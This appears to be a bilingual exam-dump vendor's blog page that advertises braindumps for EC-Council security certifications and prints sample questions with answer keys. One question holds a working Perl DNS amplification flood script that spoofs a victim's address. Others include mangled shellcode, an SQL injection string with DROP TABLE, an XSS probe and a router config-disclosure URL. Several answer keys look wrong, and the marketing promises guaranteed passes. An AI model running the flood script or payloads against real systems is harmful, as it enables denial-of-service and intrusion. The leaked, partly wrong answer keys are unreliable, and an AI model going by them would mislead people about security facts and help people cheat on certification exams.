‘EC-COUNCIL’ Category
» posted on Tuesday, November 22nd, 2011 at 5:21 am by admin
My braindumps EC-COUNCIL 312-49 Exam Training test
312-49 study materials from Examsoon will certainly assist you in gaining the knowledge and experience needed to study for your 312-49 exam. Many of our customers claim that the 312-49 study materials included in our study guide are a great compliment to our already popular 312-49 Practice Test Questions.
We prepare the 312-49 exam format so they give you a feel of the real exam for the 312-49 certificate. Examsoon 312-49 study guide replicate real exam scenarios i.e. conditions, situations, and questions etc..
You will not only get the top quality 312-49 Study Materials and Training Tools from Examsoon but can be assured of it being up to date as well. Examsoon offers economic Examsoon 312-49 Certification Training Tools packages with best quality and dynamic updates. Use Examsoon for accurate 312-49 Study Materials for a successful preparation of 312-49 Certification Exam.
312-49 exam is regarded as one of the most favourite EC-COUNCIL Certification. Many IT professionals prefer to add exam 312-49 among their credentials. The certification strengthens the employment prospects and opens up myriads of opportunities for them. Examsoon not only caters you all the information regarding the exam 312-49 but also provides you the excellent 312-49 exam dumps which makes the 312-49 certification exam easy for you.
Examsoon EC-COUNCIL Practice Questions are designed with questions, coupled with precise, logical and verified answer. Examsoon EC-COUNCIL 312-49 practice exam provides you with an examination experience like no other. To take a more authentic exam, you would have to take the exam itself in an exam center!
Although you may have come across other 312-49 study materials, only Examsoon offers you a 312-49 study materials which will allow you to quickly grasp the practical experience you will need to successfully launch your career in the IT industry!
Examsoon on-site online training experts create all of the 312-49 exam products. Examsoon main goal is to get your EC-COUNCIL Certification certified with a firm understanding of the core material. Whereas other online distributors only concern themselves with helping you obtain the paper, Examsoon strives to educate the certification candidate and better prepare them for their IT career.
Faced the fiercer and fiercer competition in IT world, do you feel great pressure? Of course, you do. Then you’d better get the EC-COUNCIL Certification to escort your career. It is suggested that the Examsoon is the best helper to your success of IT certification exam. So what are you waiting for? Go and get the latest 312-49 study materials from Examsoon!
post a comment | filed under EC-COUNCIL | tags: 312-49
» posted on Tuesday, November 1st, 2011 at 4:19 am by admin
the latest EC-COUNCIL 312-76 Exam torrent
EC-COUNCIL certification 312-76 exam is one of EC-COUNCIL Certifications. Examsoon 312-76 Testing Engine is a executable program that contains all Q&As. This Testing Engine can help you to pass 312-76 exam easily. It covers all necessary knowledge of the 312-76 exam.
If you use Examsoon 312-76 Certification questions and answers, you can experience an actual 312-76 exam. We know exactly what is needed and have all the exam notes, preparation guides and practice tests which are included in 312-76 training series. Our EC-COUNCIL Certification exam lab covers over 100% of the questions and answers that may be appeared in your 312-76 exam. Every point from Examsoon 312-76 PDF, 312-76 review will help you take EC-COUNCIL 312-76 exam much easier and become EC-COUNCIL certified in not a long time. All the materials we offer must can satisfy you.
Examsoon have designed the 312-76 exam questions in such a way that a candidate can pass this exam easily in his first attempt. Just go to the Examsoon and download free 312-76 exam questions. Our highly certified professional staff made the exam preparation guide according to the latest updates.
Examsoon EC-COUNCIL 312-76 Practice test that we can provide are based on the extensive research and real-world experiences from our online trainers, with over 10 years of IT and certification experience. 312-76 exam training, including 312-76 questions and answers feed into our customers.
We are constantly updating our EC-COUNCIL 312-76 exam. These 312-76 exam updates are supplied free of charge (for up to 90 days) to Examsoon customers.
Our EC-COUNCIL 312-76 exam questions are available to you anywhere. All of our online Training Tools are updated with the changing Exam Objectives instantly so you can be assured that you always prepare for your EC-COUNCIL Certification 312-76 Exam with latest EC-COUNCIL 312-76 Exam Objectives and most importantly, we give our EC-COUNCIL 312-76 Training Tools at reasonable prices for your own convenience. Try our EC-COUNCIL 312-76 Training Tools today.
This is the precise moment when you need to know if you are going the Examsoon way or not. Clearly there are only two possible decisions. Either you choose EC-COUNCIL Certification 312-76 or you don’t. And when you do, Examsoon is the only way you will be able to score highly. Let Examsoon take over the decision and let you manage on your own. No where else will you be able to study with the confidence that you will pass the 312-76 exam.
post a comment | filed under EC-COUNCIL | tags: 312-76
» posted on Tuesday, November 1st, 2011 at 4:18 am by admin
The Best EC-COUNCIL EC-Council Network Security Administrator Exam study guide
Examsoon is the absolute way to pass your 312-38 exam within no time. An authentic and comprehensive 312-38 exam solution is available at Examsoon. With our exclusive online 312-38 study materials you will pass 312-38 exam easily. Examsoon guarantees 100% success rate.
Examsoon provides all exam questions for 312-38 exam. With the help of Examsoon, you can learn EC-COUNCIL 312-38 exam better.
You don’t have to worry about passing your EC-COUNCIL 312-38 exam or completing the latest EC-COUNCIL Certification 312-38 Exam Objectives anymore because Examsoon EC-COUNCIL 312-38 Training Tools do it all for you.
Examsoon offer a number of study materials for the 312-38 exam, including the 312-38 study materials, the 312-38 Study Notes and the 312-38 Practice Exam. Other EC-COUNCIL Certification Training includes the EC-COUNCIL Bootcamp and the 312-38 Braindumps.
Through the EC-COUNCIL 312-38 exam is not easy. EC-COUNCIL 312-38, select the appropriate training only guarantee of success. I heard friends talking about research, but he did not to cram, but told me to go Examsoon this site with many on EC-COUNCIL 312-38 study materials, Examsoon can provide relevant research and practical experience in a wide range of foundation From online training, with more than 10 years of IT and certification experience. EC-COUNCIL 312-38 study material, including the EC-COUNCIL Certification 312-38 questions and answers will be fed back to the site.
If you want to buy the 312-38 study guide online services, then Examsoon is one of the leading websites for this purpose. Examsoon is providing the best quality and up-to-date training materials for the preparation of the 312-38 tests. All the study materials and other training products of Examsoon are cost effective and are available on the website of Examsoon with free updating facilities. All these training products are available at the Examsoon with the money back guarantee.
People always prefer and opt for EC-COUNCIL Certification exams, because EC-COUNCIL is one of the leading and valid certification in the world. When you will become certified in EC-COUNCIL 312-38 exam, then you will see the affect of EC-COUNCIL. You will be accepted and respected a lot in the field of information technology. Everybody will give you priority and you will be highly appreciated by your bosses.
post a comment | filed under EC-COUNCIL | tags: 312-38
» posted on Saturday, January 15th, 2011 at 6:10 am by admin
EC-COUNCIL認證考試312-49考古題(Examsoon)分享
一、Examsoon分享312-49認證考古題
Examsoon的312-49認證考古題由資深IT認證講師和312-49産品專家結合PROMETRIC或VUE的真實考試環境最新原題傾心打造.
Examsoon認證考試題庫-始終致力與爲客戶提供EC-COUNCIL認證的全真考題及認證學習資料,助您壹次通過EC-COUNCIL認證考試。下面是EC-COUNCIL認證考試312-49考古題分享:
312-49考古題問題與答案賞析:
1. The rule of thumb when shutting down a system is to pull the power plug. However, it has certain drawbacks. Which of the following would that be?
A. Any data not yet flushed to the system will be lost
B. All running processes will be lost
C. The /tmp directory will be flushed
D. Power interruption will corrupt the pagefile
Answer: AB
2. Microsoft Outlook maintains email messages in a proprietary format in what type of file?
A. .email
B. .mail
C. .pst
D. .doc
Answer: C
3. In conducting a computer abuse investigation you become aware that the suspect of the investigation is using ABC Company as his Internet Service Provider (ISP). You contact ISP and request that they provide you assistance with your investigation. What assistance can the ISP provide?
A. The ISP can investigate anyone using their service and can provide you with assistance
B. The ISP can investigate computer abuse committed by their employees, but must preserve the privacy of their customers and therefore cannot assist you without a warrant
C. The ISP can’t conduct any type of investigations on anyone and therefore can’t assist you
D. ISP’s never maintain log files so they would be of no use to your investigation
Answer: B
4. You are assisting in the investigation of a possible Web Server Hack. The company who called you stated that customers reported to them that whenever they entered the web address of the company in their browser, what they received was a porno graphic web site. The company checked the web server and nothing appears wrong. When you type in the IP address of the web site in your browser everything appears normal. What is the name of the attack that affects the DNS cache of the name resolution servers, resulting in those servers directing users to the wrong web site?
A. ARP Poisoning
B. DNS Poisoning
C. HTTP redirect attack
D. IP Spoofing
Answer: B
5. You are working as an independent computer forensics investigator and receive a call from a systems administrator for a local school system requesting your assistance. One of the students at the local high school is suspected of downloading inappropriate images from the Internet to a PC in the Computer lab. When you arrive at the school, the systems administrator hands you a hard drive and tells you that he made a simple backup copy of the hard drive in the PC and put it on this drive and requests that you examine that drive for evidence of the suspected images. You
inform him that a simple backup copy will not provide deleted files or recover file fragments. What type of copy do you need to make to ensure that the evidence found is complete and admissible in future proceedings?
A. Bit-stream Copy
B. Robust Copy
C. Full backup Copy
D. Incremental Backup Copy
Answer: A
二、312-49認證證照基本資料:
Computer Hacking Forensic Investigator
科目編號 : 312-49
科目名稱 : Computer Hacking Forensic Investigator
三、EC-COUNCIL認證312-49 考試推薦:
312-49 考試是EC-COUNCIL認證的 Computer Hacking Forensic Investigator 認證考試官方代號,Computer Hacking Forensic Investigator 認證作為全球IT領域專家 EC-COUNCIL 熱門認證之一,是許多大中IT企業選擇人才標準的必備條件。
Certified Ethical Hacker認證是業界最廣泛認可的IT技術認證之一,也是業界最權威、最受尊敬的認證之一。獲得312-49認證不僅僅能證明您的IT技術能力,更是您進入職場的敲門磚,也是提高您身價的另一捷徑。
EC-Council一個跨國際的資訊安全教育機構,專門為此網路問題抽絲剝繭,於認證中探討目前網路危機及網路安全預防,並且輔導取得國際性認證為公司及個人提升競爭力加強顧戶服務品質。
更多IT認證考試科目推薦:
post a comment | filed under EC-COUNCIL | tags: 312-49
» posted on Monday, August 3rd, 2009 at 11:18 am by admin
全新EC0-479题库学习指南
最新的EC0-479题库资料
科目代码: EC0-479
问题数量: 100
更新时间: 2009-09-27
报名地点: Prometric/Pearson VUE
考试全称: EC-Council Certified Security Analyst(ECSA)
EC0-479考试是EC-COUNCIL公司的EC-Council Certified Security Analyst(ECSA)认证考试官方代号,Examsoon的EC0-479权威考试题库软件是EC-COUNCIL认证厂商的授权产品,Examsoon 绝对保证第一次参加EC0-479考试的考生即可顺利通过!
Examsoon 的优势
1.Examsoon 模拟测试题具有最高的专业技术含量,只供具有相关专业知识的专家和学者学习和研究之用。
2.该测试已取得试题持有者和第三方的授权,我们深信IT业的专业人员和经理人有能力保证被授权产品的质量。
3.如果你使用 Examsoon 模拟测试,我们将保证你的第一次参加考试即取得成功,否则,我们将全额退款!
4.提供每种产品免费测试。在您决定购买之前,请检测联接,可能存在的问题及试题质量和适用性.
EC0-479考试是EC-COUNCIL厂商最热门的科目,其考试的全称为:EC-Council Certified Security Analyst(ECSA)。在此我们收集了不同题库供应商的真题集 包含 : examsoon EC0-479培训资料 ,Testinside EC0-479考题讲解, Pass4sure EC0-479题库 , Testking EC0-479考试指南, exam4sure 真题材料.只要仔细阅读以下的EC0-479题库demo的问题和答案, 相信你就会知道这个题库的质量了。
EC0-479题库由多位IT认证的专家亲自整理的考试全真试题材料,为了让大家花更少的时间来完成EC-COUNCIL EC0-479考试. examsoon考题大师EC0-479试题都是考试原题的完美组合,覆盖率95%以上,答案由多位专业资深讲师原版破解得出,正确率100%,只要您使用本站的考试题库参加EC0-479考试,我们保证您一次轻松通过考试;
EC0-479题库问题与答案赏析
Exam : EC-Council EC0-479
Title : EC-Council Certified Security Analyst (ECSA)
1. Simon is a former employee of Trinitron XML Inc. He feels he was wrongly terminated and wants to hack into his former company’s network. Since Simon remembers some of the server names, he attempts to run the axfr and ixfr commands using DIG. What is Simon trying to accomplish here?
A. Send DOS commands to crash the DNS servers
B. Perform DNS poisoning
C. Perform a zone transfer
D. Enumerate all the users in the domain
Answer: C
2. What is the following command trying to accomplish? C:> nmap -sU -p445 192.168.0.0/24
A. Verify that UDP port 445 is open for the 192.168.0.0 network
B. Verify that TCP port 445 is open for the 192.168.0.0 network
C. Verify that NETBIOS is running for the 192.168.0.0 network
D. Verify that UDP port 445 is closed for the 192.168.0.0 network
Answer: A
3. You work as an IT security auditor hired by a law firm in Boston to test whether you can gain access to sensitive information about the company clients. You have rummaged through their trash and found very little information. You do not want to set off any alarms on their network, so you plan on performing passive footprinting against their Web servers. What tool should you use?
A. Ping sweep
B. Nmap
C. Netcraft
D. Dig
Answer: C
4. You setup SNMP in multiple offices of your company. Your SNMP software manager is not receiving data from other offices like it is for your main office. You suspect that firewall changes are to blame. What ports should you open for SNMP to work through Firewalls (Select 2)
A. 162
B. 161
C. 163
D. 160
Answer: AB
5. You are assisting a Department of Defense contract company to become compliant with the stringent security policies set by the DoD. One such strict rule is that firewalls must only allow incoming connections that were first initiated by internal computers. What type of firewall must you implement to abide by this policy?
A. Packet filtering firewall
B. Circuit-level proxy firewall
C. Application-level proxy firewall
D. Statefull firewall
Answer: D
6. You are the network administrator for a small bank in Dallas, Texas. To ensure network security, you enact a security policy that requires all users to have 14 character passwords. After giving your users 2 weeks notice, you change the Group Policy to force 14 character passwords. A week later you dump the SAM database from the standalone server and run a password-cracking tool against it. Over 99% of the passwords are broken within an hour. Why were these passwords cracked so quickly?
A. Passwords of 14 characters or less are broken up into two 7-character hashes
B. A password Group Policy change takes at least 3 weeks to completely replicate throughout a network
C. Networks using Active Directory never use SAM databases so the SAM database pulled was empty
D. The passwords that were cracked are local accounts on the Domain Controller
Answer: A
7. What will the following command produce on a website login page?
SELECT email, passwd, login_id, full_name
FROM members
WHERE email = ’someone@somehwere.com’; DROP TABLE members; –’
A. Deletes the entire members table
B. Inserts the Error! Reference source not found. email address into the members table
C. Retrieves the password for the first user in the members table
D. This command will not produce anything since the syntax is incorrect
Answer: A
8. Jessica works as systems administrator for a large electronics firm. She wants to scan her network quickly to detect live hosts by using ICMP ECHO Requests. What type of scan is Jessica going to perform?
A. Tracert
B. Smurf scan
C. Ping trace
D. ICMP ping sweep
Answer: D
9. You are carrying out the last round of testing for your new website before it goes live. The website has many dynamic pages and connects to a SQL backend that accesses your product inventory in a database. You come across a web security site that recommends inputting the following code into a search field on web pages to check for vulnerabilities:
<script>alert("This is a test.")</script>
When you type this and click on search, you receive a pop-up window that says:
"This is a test."
What is the result of this test?
A. Your website is vulnerable to CSS
B. Your website is not vulnerable
C. Your website is vulnerable to SQL injection
D. Your website is vulnerable to web bugs
Answer: A
10. You are a security analyst performing a penetration tests for a company in the Midwest. After some initial reconnaissance, you discover the IP addresses of some Cisco routers used by the company. You type in the following URL that includes the IP address of one of the routers:
http://172.168.4.131/level/99/exec/show/config
After typing in this URL, you are presented with the entire configuration file for that router. What have you discovered?
A. HTTP Configuration Arbitrary Administrative Access Vulnerability
B. HTML Configuration Arbitrary Administrative Access Vulnerability
C. Cisco IOS Arbitrary Administrative Access Online Vulnerability
D. URL Obfuscation Arbitrary Administrative Access Vulnerability
Answer: A
11. If an attacker’s computer sends an IPID of 31400 to a zombie computer on an open port in IDLE scanning, what will be the response?
A. The zombie will not send a response
B. 31402
C. 31399
D. 31401
Answer: D
12. An "idle" system is also referred to as what?
A. PC not connected to the Internet
B. Zombie
C. PC not being used
D. Bot
Answer: B
13. Michael works for Kimball Construction Company as senior security analyst. As part of yearly security audit, Michael scans his network for vulnerabilities. Using Nmap, Michael conducts XMAS scan and most of the ports scanned do not give a response. In what state are these ports?
A. Closed
B. Open
C. Stealth
D. Filtered
Answer: B
14. When you are running a vulnerability scan on a network and the IDS cuts off your connection, what type of IDS is being used?
A. Passive IDS
B. Active IDS
C. Progressive IDS
D. NIPS
Answer: B
免费下载EC0-479认证考题Demo
post a comment | filed under EC-COUNCIL
» posted on Monday, August 3rd, 2009 at 11:18 am by admin
全新EC0-350题库学习指南
最新的EC0-350题库资料
科目代码: EC0-350
问题数量: 339
更新时间: 2009-09-09
报名地点: Prometric/Pearson VUE
考试全称: ethical hacking and countermeasures
EC0-350考试是EC-COUNCIL公司的ethical hacking and countermeasures认证考试官方代号,Examsoon的EC0-350权威考试题库软件是EC-COUNCIL认证厂商的授权产品,Examsoon 绝对保证第一次参加EC0-350考试的考生即可顺利通过!
Examsoon 的优势
1.Examsoon 模拟测试题具有最高的专业技术含量,只供具有相关专业知识的专家和学者学习和研究之用。
2.该测试已取得试题持有者和第三方的授权,我们深信IT业的专业人员和经理人有能力保证被授权产品的质量。
3.如果你使用 Examsoon 模拟测试,我们将保证你的第一次参加考试即取得成功,否则,我们将全额退款!
4.提供每种产品免费测试。在您决定购买之前,请检测联接,可能存在的问题及试题质量和适用性.
EC0-350考试是EC-COUNCIL厂商最热门的科目,其考试的全称为:ethical hacking and countermeasures。在此我们收集了不同题库供应商的真题集 包含 : examsoon EC0-350培训资料 ,Testinside EC0-350考题讲解, Pass4sure EC0-350题库 , Testking EC0-350考试指南, exam4sure 真题材料.只要仔细阅读以下的EC0-350题库demo的问题和答案, 相信你就会知道这个题库的质量了。
EC0-350题库由多位IT认证的专家亲自整理的考试全真试题材料,为了让大家花更少的时间来完成EC-COUNCIL EC0-350考试. examsoon考题大师EC0-350试题都是考试原题的完美组合,覆盖率95%以上,答案由多位专业资深讲师原版破解得出,正确率100%,只要您使用本站的考试题库参加EC0-350考试,我们保证您一次轻松通过考试;
EC0-350题库问题与答案赏析
Exam : EC-Council EC0-350
Title : Ethical Hacking and Countermeasures
1. You are gathering competitive intelligence on an organization. You notice that they have jobs listed on a few Internet job-hunting sites. There are two jobs for network and system administrators. How can this help you in footprinting the organization?
A. The IP range used by the target network
B. How strong the corporate security policy is
C. The types of operating systems and applications being used
D. An understanding of the number of employees in the company
Answer: C
2. You have chosen a 22 character word from the dictionary as your password. How long will it take to crack the password by an attacker?
A. 5 minutes
B. 23 days
C. 200 years
D. 16 million years
Answer: A
3. The United Kingdom (UK) has passed a law that makes hacking into an unauthorized network a felony.
The law states:
Section 1 of the Act refers to unauthorized access to computer material. This states that a person commits an offence if he causes a computer to perform any function with intent to secure unauthorized access to any program or data held in any computer. For a successful conviction under this part of the Act, the prosecution must prove that the access secured is unauthorized and that the suspect knew that this was the case. This section is designed to deal with common-or-garden hacking.
Section 2 of the Act deals with unauthorized access with intent to commit or facilitate the commission of further offences. An offence is committed under Section 2 if a Section 1 offence has been committed and there is the intention of committing or facilitating a further offence (any offence which attracts a custodial sentence of more than five years, not necessarily one covered by the Act). Even if it is not possible to prove the intent to commit the further offence, the Section 1 offence is still committed.
Section 3 offences cover unauthorized modification of computer material, which generally means the creation and distribution of viruses. For a conviction to succeed there must have been the intent to cause the modification, and knowledge that the modification had not been authorized.
What is this law called?
A. Computer Misuse Act 1990
B. Computer Incident Act 2000
C. Cyber Crime Law Act 2003
D. Cyber Space Crime Act 1995
Answer: A
4. System administrators sometimes post questions to newsgroups when they run into technical challenges. As an ethical hacker, you could use the information in newsgroup postings to glean insight into the makeup of a target network. How would you search for these posting using Google search?
A. Search in Google using the key search strings "the target company" and "newsgroups"
B. Search for the target company name at http://groups.google.com
C. Use NNTP websites to search for these postings
D. Search in Google using the key search strings "the target company" and "forums"
Answer: B
5. Clive has been hired to perform a Black-Box test by one of his clients. How much information will Clive be able to get from the client before commencing his test?
A. Only the IP address range
B. Nothing but corporate name
C. All that is available from the client
D. IP Range, OS, and patches installed
Answer: B
6. What does this symbol mean?
A. Open access point
B. WPA encrypted access point
C. WEP encrypted access point
D. Closed access point
Answer: A
7. What is the most common vehicle for social engineering attacks?
A. Email
B. Direct in person
C. Local Area Networks
D. Peer to Peer networks
Answer: B
8. A Hacker would typically use a botnet to send a large number of queries to open DNS servers. These queries will be "spoofed" to look like they come from the target of the flooding, and the DNS server will reply to that network address.
It is generally possible to stop the more-common bot-delivered attack by blocking traffic from the attacking machines, which are identifiable. But blocking queries from DNS servers brings problems in its wake. A DNS server has a valid role to play in the workings of the Internet. Blocking traffic to a DNS server could also mean blocking legitimate users from sending e-mail or visiting a Web site. A single DNS query could trigger a response that is as much as 73 times larger than the request.
The following perl code can launch these attacks.
use Net::DNS::Resolver;
use Net::RawIP;
open(LIST,"ns.list");
@list=<LIST>;
close LIST;
chomp(@list);
my $lnum=@list;
my $i=0;
my $loop=0;
if ($ARGV[0] eq ”) {
print "Usage: ./hackme.pl <target IP> <loop count>n";
exit(0);
}
while($loop < $ARGV[1]) {
while($i < $lnum) {
my $source = $ARGV[0];
my $dnspkt = new Net::DNS::Packet("google.com","ANY");
my $pktdata = $dnspkt->data;
my $sock = new Net::RawIP({udp=>{}});
$sock->set({ip => { saddr => $source, daddr => $list[$i], frag_off=>0,tos=>0,id=>1565}, udp => {source => 53, dest => 53, data=>$pktdata} });
$sock->send;
$i++;
}$loop++; $i=0;}
exit(0);
What type of attacks are these?
A. DNS reflector and amplification attack
B. DNS cache poisoning attacks
C. DNS reverse connection attacks
D. DNS forward lookup attacks
Answer: A
9. What hacking attack is challenge/response authentication used to prevent?
A. Replay attacks
B. Scanning attacks
C. Session hijacking attacks
D. Password cracking attacks
Answer: A
10. You have successfully run a buffer overflow attack against a default IIS installation running on a Windows 2000 server. The server allows you to spawn a shell. In order to perform the actions you intend to do, you need elevated permissions. You need to know what your privileges are within the shell. What are your current privileges?
A. LocalSystem
B. Administrator
C. IUSR_COMPUTERNAME
D. IIS default installation account
Answer: A
11. while investigating a claim of a user downloading illegal material, the investigator goes through the files on the suspects workstation. He comes across a file that is just called "file.txt" but when he opens it, he finds the following:
#define MAKE_STR_FROM_RET(x) ((x)&0xff),(((x)&0xff00)>>8),(((x)&0xff0000)>>16),(((x)&0xff000000)>>24)
char infin_loop[]= /* for testing purposes */
"xEBxFE";
char bsdcode[] = /* Lam3rZ chroot() code by venglin */
"x31xc0×50x50×50xb0×7excdx80×31xdbx31xc0×43"
"x43×53x4bx53×53xb0×5axcdx80xebx77×5ex31xc0"
"x8dx5ex01×88x46×04x66×68xffxffx01×53x53xb0"
"x88xcdx80×31xc0×8dx5ex01×53x53xb0×3dxcdx80"
"x31xc0×31xdbx8dx5ex08×89x43×02x31xc9xfexc9"
"x31xc0×8dx5ex08×53x53xb0×0cxcdx80xfexc9×75"
"xf1×31xc0×88x46×09x8dx5ex08×53x53xb0×3dxcd"
"x80xfex0exb0×30xfexc8×88x46×04x31xc0×88x46"
"x07×89x76×08x89×46x0cx89xf3×8dx4ex08×8dx56"
"x0cx52×51x53×53xb0×3bxcdx80×31xc0×31xdbx53"
"x53xb0×01xcdx80xe8×84xffxffxffxffx01xffxffx30"
"x62×69x6ex30×73x68×31x2ex2ex31×31x76×65x6e"
"x67×6cx69×6e";
static int magic[MAX_MAGIC],magic_d[MAX_MAGIC];
static char *magic_str=NULL;
int before_len=0;
What can he infer from this file?
A. An encrypted file
B. A uuencoded file
C. A buffer overflow
D. A picture that has been renamed with a .txt extension
Answer: C
12. Spears Technology, Inc is a software development company located in Los Angeles, California. They reported a breach in security, stating that its "security defenses has been breached and exploited for 2 weeks by hackers." The hackers had accessed and downloaded 90,000 addresses containing customer credit cards and passwords. Spears Technology found this attack to be so severe that they reported the attack to the FBI for a full investigation. Spears Technology was looking to law enforcement officials to protect their intellectual property.
How did this attack occur? The intruder entered through an employees home machine, which was connected to Spears Technologys corporate VPN network. The application called BEAST Trojan was used in the attack to open a "back door" allowing the hackers undetected access. The security breach was discovered when customers complained about the usage of their credit cards without their knowledge.
The hackers were traced back to Beijing, China through e-mail address evidence. The credit card information was sent to that same e-mail address. The passwords allowed the hackers to access Spears Technologys network from a remote location, posing as employees. The intent of the attack was to steal the source code for their VOIP system and "hold it hostage" from Spears Technology, in exchange for ransom.
The hackers had intended on selling the stolen VOIP software source code to competitors.
How would you prevent such attacks from occurring in the future at Spears Technology?
A. Disable VPN access to all your employees from home machines
B. Allow VPN access but replace the standard authentication with biometric authentication
C. Replace the VPN access with dial-up modem access to the companys network
D. Enable 25 character complex password policy for employees to access the VPN network
Answer: A
13. Travis works primarily from home as a medical transcriptionist. He just bought a brand new Dual Core Pentium computer with over 3 GB of RAM. He uses voice recognition software to help him transfer what he dictates to electronic documents. The voice recognition software is processor intensive, which is why he bought the new computer. Travis frequently has to get on the Internet to do research on what he is working on. After about two months of working on his new computer, he notices that it is not running nearly as fast as it used to. Travis uses antivirus software, anti-spyware software, and always keeps the computer up-to-date with Microsoft patches.After another month of working on the computer, Travis?computer is even more noticeably slow. Every once in awhile, Travis also notices a window or two pop-up on his screen, but they quickly disappear. He has seen these windows show up, even when he has not been on the Internet. Travis is really worried about his computer because he spent a lot of money on it, and he depends on it to work. Travis scans his computer with all kinds of software, and cannot find anything out of the ordinary. Travis decides to go through Windows Explorer and check out the file system, folder by folder, to see if there is anything he can find. He spends over four hours pouring over the files and folders and cannot find anything. But, before he gives up, he notices that his computer only has about 10 GB of free space available. Since his hard drive is a 200 GB hard drive, Travis thinks this is very odd. ?
Travis downloads Space Monger and adds up the sizes for all the folders and files on his computer. According to his calculations, he should have around 150 GB of free space. What is mostly likely the cause of Travis?problems?
A. Traviss computer is infected with stealth kernel level rootkit
B. Traviss computer is infected with Stealth Trojan Virus
C. Traviss computer is infected with Self-Replication Worm that fills the hard disk space
D. Logic Bomb is triggered at random times creating hidden data consuming junk files
Answer: A
14. Bob has set up three web servers on Windows Server 2003 IIS 6.0. Bob has followed all the recommendations for securing the operating system and IIS. These servers are going to run numerous e-commerce websites that are projected to bring in thousands of dollars a day. Bob is still concerned about the security of these servers because of the potential for financial loss. Bob has asked his companys firewall administrator to set the firewall to inspect all incoming traffic on ports 80 and 443 to ensure that no malicious data is getting into the network.Why will this not be possible?
A. Firewalls cannot inspect traffic coming through port 443
B. Firewalls can only inspect outbound traffic
C. Firewalls cannot inspect traffic coming through port 80
D. Firewalls cannot inspect traffic at all, they can only block or allow certain ports
Answer: D
免费下载EC0-350认证考题Demo
post a comment | filed under EC-COUNCIL
» posted on Monday, August 3rd, 2009 at 11:15 am by admin
全新EC0-232题库学习指南
最新的EC0-232题库资料
科目代码: EC0-232
问题数量: 500
更新时间: 2009-09-18
报名地点: Prometric/Pearson VUE
考试全称: e-commerce architect
EC0-232考试是EC-COUNCIL公司的e-commerce architect认证考试官方代号,Examsoon的EC0-232权威考试题库软件是EC-COUNCIL认证厂商的授权产品,Examsoon 绝对保证第一次参加EC0-232考试的考生即可顺利通过!
Examsoon 的优势
1.Examsoon 模拟测试题具有最高的专业技术含量,只供具有相关专业知识的专家和学者学习和研究之用。
2.该测试已取得试题持有者和第三方的授权,我们深信IT业的专业人员和经理人有能力保证被授权产品的质量。
3.如果你使用 Examsoon 模拟测试,我们将保证你的第一次参加考试即取得成功,否则,我们将全额退款!
4.提供每种产品免费测试。在您决定购买之前,请检测联接,可能存在的问题及试题质量和适用性.
EC0-232考试是EC-COUNCIL厂商最热门的科目,其考试的全称为:e-commerce architect。在此我们收集了不同题库供应商的真题集 包含 : examsoon EC0-232培训资料 ,Testinside EC0-232考题讲解, Pass4sure EC0-232题库 , Testking EC0-232考试指南, exam4sure 真题材料.只要仔细阅读以下的EC0-232题库demo的问题和答案, 相信你就会知道这个题库的质量了。
EC0-232题库由多位IT认证的专家亲自整理的考试全真试题材料,为了让大家花更少的时间来完成EC-COUNCIL EC0-232考试. examsoon考题大师EC0-232试题都是考试原题的完美组合,覆盖率95%以上,答案由多位专业资深讲师原版破解得出,正确率100%,只要您使用本站的考试题库参加EC0-232考试,我们保证您一次轻松通过考试;
EC0-232题库问题与答案赏析
Exam : EC-Council EC0-232
Title : E-Commerce Architect
1. Which of the following methods would not be as effective (defined as users/dollar) for a vertical B2B site?
A. Television advertisements
B. Individual contact
C. Trade journals
D. Affiliation services
Answer: A
2. You’re designing an E-Commerce Web site that sells to consumers. You need a unique identifier to assign to each visitor, so their activities can be tracked. Based on the above scenario, which one of the following choices is a secure and reliable way doing this?
A. Keep their IP Address in the Web Server’s memory.
B. Put their email address in a cookie.
C. Store their IP Address in a Database.
D. Give them a cookie with a Unique ID, then store it in a database.
Answer: D
3. What are the four steps of developing and managing an e-infrastructure?
A. 1. Electronic Commerce strategy formulation
2. Application design
3. Building or buying the application
4. Hosting/operating and maintaining the Electronic Commerce.
B. 1. Electronic Commerce strategy formulation
2. Building or buying the application
3. Hosting/operating and maintaining the Electronic Commerce.
C. 1. Electronic Commerce strategy formulation
2. Building or buying the application
3. Hosting the Electronic Commerce.
D. 1. Electronic Commerce strategy formulation
2. Application design
3. Building or buying the application
4. Hosting the Electronic Commerce.
Answer: A
4. Among the usages and advantages of the Internet for business use are:
A. Marketing and selling products and services.
B. Promoting a paper-free environment.
C. Efficiency and unequaled cost-effectiveness.
D. All of the above.
Answer: D
5. Which of the following is a tangible benefit of SCM software integration?
A. IT cost reduction
B. Information visibility
C. Standardization
D. Customer responsiveness
Answer: A
6. Which of the following is an example of edutainment?
A. Combining a popular video game with geographic information.
B. Combining a popular movie with a video game.
C. Basing a learning game on the theme of a popular movie.
D. Basing a learning game on the theme of a popular video game.
Answer: A
7. An employee is using the company’s computers to do personal work. What type of ethical issue is involved?
A. Privacy
B. Accuracy
C. Property
D. Accessibility
Answer: C
8. Which of the following is not an electronic activity in government?
A. Government-to-school transactions
B. Government-to-government transactions
C. Government-to-business transactions
D. Government-to-citizen transactions
Answer: A
9. Ethics is:
A. Justice, equity, honesty, trustworthiness, and fairness.
B. A subjective feeling of being innately right.
C. An important issue in e-commerce.
D. Being self centered.
Answer: A
10. Which of the following is the most serious strategic threat to traditional travel agents?
A. Low prices
B. Intelligent software agents
C. Automated Services
D. 24 hour service
Answer: A
11. What does the term "banner blindness" refer to?
A. The growing trend of adding interactivity to banner advertisements to increase their visibility.
B. The anonymous tracking of banner impressions and browsing behaviors across multiple sites.
C. The refusal of companies to acknowledge banner advertising as a valuable advertising medium.
D. The growing trend of visitors completely ignoring banner advertisements.
Answer: D
12. Company Abacusboss.com sells a variety of products on its Web site to the highest bidder. What type of business model are they using?
A. Affiliate Marketing
B. Online Auction
C. Supply Chain improver
D. Name your price
Answer: B
13. Brett’s company is beginning an Electronic Commerce effort because his competitors are beginning to be successful at it. Which approach is Brett using to make his decision?
A. Problem-driven
B. Technology-driven
C. Market-driven
D. Fear-driven
Answer: C
14. What is a benefit of Frequently Asked Questions (FAQ)?
A. Allows the customer to quickly find answers to questions.
B. The answers can change dynamically based on the questions.
C. The merchant is able to avoid questions by answering common ones up front.
D. The merchant is able to answer questions at a lower cost.
Answer: A
免费下载EC0-232认证考题Demo
post a comment | filed under EC-COUNCIL
» posted on Monday, August 3rd, 2009 at 11:07 am by admin
全新EC0-349题库学习指南
最新的EC0-349题库资料
科目代码: EC0-349
问题数量: 186
更新时间: 2009-09-29
报名地点: Prometric/Pearson VUE
考试全称: Computer Hacking Forensic Investigator
